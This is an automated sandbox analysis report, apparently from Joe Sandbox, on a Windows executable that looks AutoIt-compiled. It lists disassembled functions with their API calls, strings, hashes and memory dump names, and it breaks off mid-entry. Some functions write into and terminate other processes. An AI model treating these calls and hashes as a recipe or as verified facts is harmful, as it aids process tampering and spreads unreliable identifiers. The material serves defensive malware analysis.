Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 2b75124999396293fb2f5eab6ba834d1bd0fe033c0a0c7810a32bdf920144b43
Instruction ID: 0d40194ccf4f793bd6f344f122031b4d12e7733e9f1077eb8ba021936278c85b
Opcode Fuzzy Hash: 2b75124999396293fb2f5eab6ba834d1bd0fe033c0a0c7810a32bdf920144b43
Instruction Fuzzy Hash: 61016CB09027597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5A864CBE5

Function 007CEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007CEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007CEB46
GetWindowThreadProcessId.USER32(?,?), ref: 007CEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007CEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007CEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007CEB75

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6767a7187ecece7c912dcac311844f72e1d3600c679aa611bedad0fd02edced2
Instruction ID: a06114339e9d0fa837849a53bef4c63a1cd8a36f73145904e4d71bd15a3a4406
Opcode Fuzzy Hash: 6767a7187ecece7c912dcac311844f72e1d3600c679aa611bedad0fd02edced2
Instruction Fuzzy Hash: 36F03AB224015CBBE7225B629D0EEFF3B7CEFCAB11F008158F601D1091DBA85A01D6B9

Function 007C1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 007C187F
UnloadUserProfile.USERENV(?,?), ref: 007C188B
CloseHandle.KERNEL32(?), ref: 007C1894
CloseHandle.KERNEL32(?), ref: 007C189C
GetProcessHeap.KERNEL32(00000000,?), ref: 007C18A5
HeapFree.KERNEL32(00000000), ref: 007C18AC

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 06f83aae6165e5ff8013469f9ba4567df96e03ec18218110f2bd1c925791679e
Instruction ID: a20f120d14c91336fafbf88e0e422af3dddddb3bc9bd887c73caa2877e932558
Opcode Fuzzy Hash: 06f83aae6165e5ff8013469f9ba4567df96e03ec18218110f2bd1c925791679e
Instruction Fuzzy Hash: B5E0C276004109FBDA026BA1EE0CD1ABF29FF49B22B11C220F22581070CB369830EB68

Function 007E7B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00780242: EnterCriticalSection.KERNEL32(0083070C,00831884,?,?,0077198B,00832518,?,?,?,007612F9,00000000), ref: 0078024D
Part of subcall function 00780242: LeaveCriticalSection.KERNEL32(0083070C,?,0077198B,00832518,?,?,?,007612F9,00000000), ref: 0078028A

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

Part of subcall function 007800A3: __onexit.LIBCMT ref: 007800A9

__Init_thread_footer.LIBCMT ref: 007E7BFB

Part of subcall function 007801F8: EnterCriticalSection.KERNEL32(0083070C,?,?,00778747,00832514), ref: 00780202
Part of subcall function 007801F8: LeaveCriticalSection.KERNEL32(0083070C,?,00778747,00832514), ref: 00780235

Strings

Variable must be of type 'Object'., xrefs: 007E7C3A
+T{, xrefs: 007E7E2E
5, xrefs: 007E7C78
G, xrefs: 007E7C7F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +T{$5$G$Variable must be of type 'Object'.
API String ID: 535116098-1022402583
Opcode ID: 13d4c59f35188817be07c8a71053a0c6c6f014896973b29b23929b47106519f0
Instruction ID: d7d5a719b3174b11d7fa1ded694697ef24c4c2a8b9f7db9467fce93c600ac3b4
Opcode Fuzzy Hash: 13d4c59f35188817be07c8a71053a0c6c6f014896973b29b23929b47106519f0
Instruction Fuzzy Hash: B291BE70A05249EFCB08EF55D994DBDB7B5FF48304F108049F806AB292DB79AE45CB61

Function 007CC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00767620: _wcslen.LIBCMT ref: 00767625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007CC6EE
_wcslen.LIBCMT ref: 007CC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007CC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007CC7CA

Strings

0, xrefs: 007CC6AF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: d2ff404e71b7368f672be1cf2ac658754c1c5e7b02e7b8afd5b0c3072441f692
Instruction ID: 903e9ca54e8f2e4992742e87a5b8bd9b84559710497c8b0f5eefc8c4c93888b7
Opcode Fuzzy Hash: d2ff404e71b7368f672be1cf2ac658754c1c5e7b02e7b8afd5b0c3072441f692
Instruction Fuzzy Hash: E451C0716143019BD7169F28C989F6BB7E8EF89710F040A2DF999E31A0DB78D904DB92

Function 007EAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 007EAEA3

Part of subcall function 00767620: _wcslen.LIBCMT ref: 00767625

GetProcessId.KERNEL32(00000000), ref: 007EAF38
CloseHandle.KERNEL32(00000000), ref: 007EAF67

Strings

@, xrefs: 007EAE72
<, xrefs: 007EAE6B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: abfd0af2cbea7e489f243c73c78b56c0003d152c39d39fdb084c857a286a24af
Instruction ID: 3acbbf23c3d0e5e63c4cccc931d0fac7cb35d9707ccfcdc3d9f736f06d904f92
Opcode Fuzzy Hash: abfd0af2cbea7e489f243c73c78b56c0003d152c39d39fdb084c857a286a24af
Instruction Fuzzy Hash: 1B719B71A00259EFCB15DF55C489A9EBBF0FF08314F048499E816AB3A2C778ED45CB91

Function 007F6278 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0121E8F8,?), ref: 007F62E2
ScreenToClient.USER32(?,?), ref: 007F6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 007F6382

Strings

@U=u, xrefs: 007F63DD

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: @U=u
API String ID: 3880355969-2594219639
Opcode ID: c4c9308cf2be9fb3899d486088167e90c53aa23943aebc968f4442d14d2cb9e3
Instruction ID: 0c78575f3d41d3a3901fab3d7e1bc58c84426499e622c212f9d9e3c2943a6849
Opcode Fuzzy Hash: c4c9308cf2be9fb3899d486088167e90c53aa23943aebc968f4442d14d2cb9e3
Instruction Fuzzy Hash: 6B510674A00209EFCF14DF68D984ABE7BB5FF95360F108569EA259B390D734AD41CB50

Function 007C2716 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007CB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C21D0,?,?,00000034,00000800,?,00000034), ref: 007CB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007C2760

Part of subcall function 007CB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 007CB3F8

Part of subcall function 007CB32A: GetWindowThreadProcessId.USER32(?,?), ref: 007CB355
Part of subcall function 007CB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C2194,00000034,?,?,00001004,00000000,00000000), ref: 007CB365
Part of subcall function 007CB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C2194,00000034,?,?,00001004,00000000,00000000), ref: 007CB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007C27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007C281A

Strings

@, xrefs: 007C2832
@U=u, xrefs: 007C2760, 007C27CD, 007C281A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @$@U=u
API String ID: 4150878124-826235744
Opcode ID: 4ee16cc98e25915d892886c5604763b8dd9e9e9f950d8d901efb0746f53f8e58
Instruction ID: 5a33e580a43cc08f3f8630bf6f718752466079092ad6ef701668279e689cd6d1
Opcode Fuzzy Hash: 4ee16cc98e25915d892886c5604763b8dd9e9e9f950d8d901efb0746f53f8e58
Instruction Fuzzy Hash: BF41FB76900218AFDB11DBA4CD86FEEBBB8EF09700F104099FA55B7181DB746E45CBA1

Function 007C719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007C7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007C723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007C724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007C72CF

Strings

DllGetClassObject, xrefs: 007C7242

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 0498060b94a150e0665aafa3d3bffa29bed7422f1ec904e9e58ae66120e52730
Instruction ID: 9afbbfdca6c5d7b47048624644349176b5b46d8568193c49a7e9e6d678b379d4
Opcode Fuzzy Hash: 0498060b94a150e0665aafa3d3bffa29bed7422f1ec904e9e58ae66120e52730
Instruction Fuzzy Hash: 0C41FAB1604204ABDB19CF54C984FAA7BB9FF44310B2580ADBD059F20ADBB9D945DFA0

Function 007EC9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007EC9F1
_wcslen.LIBCMT ref: 007ECA68
_wcslen.LIBCMT ref: 007ECA9E
_wcslen.LIBCMT ref: 007ECAF9
_wcslen.LIBCMT ref: 007ECB2F
_wcslen.LIBCMT ref: 007ECB7F

Strings

HKLM, xrefs: 007ECA98, 007ECA9D
HKEY_LOCAL_MACHINE, xrefs: 007ECA62, 007ECA67

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: 34f6b90076e4a2b5d6a22d07ed0d1ff7f3058f92f90a2ebebed68355065228a6
Instruction ID: b3564211e3696b042447bad8919ed2d84d512fcfa010d0db87c782f527478acd
Opcode Fuzzy Hash: 34f6b90076e4a2b5d6a22d07ed0d1ff7f3058f92f90a2ebebed68355065228a6
Instruction Fuzzy Hash: 13312D776021EA8BCB22EF6ED94047E33919BA9750B158039EC55AB344E678CD86D3A0

Function 007F2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007F2F8D
LoadLibraryW.KERNEL32(?), ref: 007F2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007F2FA9
DestroyWindow.USER32(?), ref: 007F2FB1

Strings

SysAnimate32, xrefs: 007F2F68

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 68550734aeb608dac55c42e13cce2a6d196446e57f8a2ce447f7f1b85cfd8bda
Instruction ID: 73605c152abbe044540b2751734170d624a003352c4e41d88dce2ee71307de75
Opcode Fuzzy Hash: 68550734aeb608dac55c42e13cce2a6d196446e57f8a2ce447f7f1b85cfd8bda
Instruction Fuzzy Hash: 1E21FD7122420DABEF114FA8DC84EBB37FDEB58324F104628FA10D22A1C339DC829760

Function 007F5660 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 007F56BB
_wcslen.LIBCMT ref: 007F56CD
_wcslen.LIBCMT ref: 007F56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 007F5816

Strings

@U=u, xrefs: 007F56BB, 007F5816

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend_wcslen
String ID: @U=u
API String ID: 455545452-2594219639
Opcode ID: a79703f937dbd78dc5ec88c72d83b2fea27d94ebc43e16d1fa0fdcac184a1add
Instruction ID: 925b13e3719e4eb7db2e89c3513048ce02af8ff361c44be4e02c669a11656f15
Opcode Fuzzy Hash: a79703f937dbd78dc5ec88c72d83b2fea27d94ebc43e16d1fa0fdcac184a1add
Instruction Fuzzy Hash: 8D11B47160460CA6DF20DF61CC89AFE77ACEF11760B108066FB15D6281E7B89980CB64

Function 0076600E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0076604C
GetStockObject.GDI32(00000011), ref: 00766060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0076606A

Strings

@U=u, xrefs: 0076606A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID: @U=u
API String ID: 3970641297-2594219639
Opcode ID: 9179feff1590b05cc38d496d850ce2ceae478b9793413d87d1eb6f3a91d84de2
Instruction ID: 274c2512348ae3cba51f4b08a198c05796c0dfd09efbf1579b456f9a7e45751b
Opcode Fuzzy Hash: 9179feff1590b05cc38d496d850ce2ceae478b9793413d87d1eb6f3a91d84de2
Instruction Fuzzy Hash: D5115B72501508BFEF125FA49C44EFABF69EF497A4F444225FE1652110D73A9C60EBA0

Function 00784D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00784D1E,007928E9,?,00784CBE,007928E9,008288B8,0000000C,00784E15,007928E9,00000002), ref: 00784D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00784DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00784D1E,007928E9,?,00784CBE,007928E9,008288B8,0000000C,00784E15,007928E9,00000002,00000000), ref: 00784DC3

Strings

CorExitProcess, xrefs: 00784D98
mscoree.dll, xrefs: 00784D86

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c1933c8c60b7cf7e1238e9501bbfe3d0568bce1c404031bb80046bc8eccc080c
Instruction ID: 45d8cb080c6be250e72b771de8312afb50e5d97992838e5d95e8e1f9b315eb3b
Opcode Fuzzy Hash: c1933c8c60b7cf7e1238e9501bbfe3d0568bce1c404031bb80046bc8eccc080c
Instruction Fuzzy Hash: 94F0AF30A4020DFBDB11AF90DC09BADBBB5EF04751F0040A4F905A22A0CB795940CB95

Function 007BD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 007BD3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007BD3BF
FreeLibrary.KERNEL32(00000000), ref: 007BD3E5

Strings

X64, xrefs: 007BD2A8
GetSystemWow64DirectoryW, xrefs: 007BD3B9

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 00fe1e1b8955a79d4a82586f8656cd6a3abf19d3e5ac71bcd8569fd1b22379ee
Instruction ID: e614e7b3c606d267839c29dc62cd26d960226b1fd6ef60f2b0c340bfa6e13f4d
Opcode Fuzzy Hash: 00fe1e1b8955a79d4a82586f8656cd6a3abf19d3e5ac71bcd8569fd1b22379ee
Instruction Fuzzy Hash: A6F055B5401A69CBDB3223108D18BFD3320BF10B01B58C068F806E2102FB6CCD84C683

Function 00764E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00764EDD,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00764EAE
FreeLibrary.KERNEL32(00000000,?,?,00764EDD,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764EC0

Strings

kernel32.dll, xrefs: 00764E94
Wow64DisableWow64FsRedirection, xrefs: 00764EA8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 81f28cc106d7c56405bfe096c5d37d0894459be7300a9411c7052117caae4831
Instruction ID: 0259b7e0451f08f3590b52b7c768dfdb83254fefdfce4fe34dc49f9eeac2d45e
Opcode Fuzzy Hash: 81f28cc106d7c56405bfe096c5d37d0894459be7300a9411c7052117caae4831
Instruction Fuzzy Hash: 1DE0C2B6E0263A6BD2331B25BD18B7F6769BF81F62B094115FD06E2200DB6CCD01C4A5

Function 00764E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,007A3CDE,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00764E74
FreeLibrary.KERNEL32(00000000,?,?,007A3CDE,?,00831418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00764E87

Strings

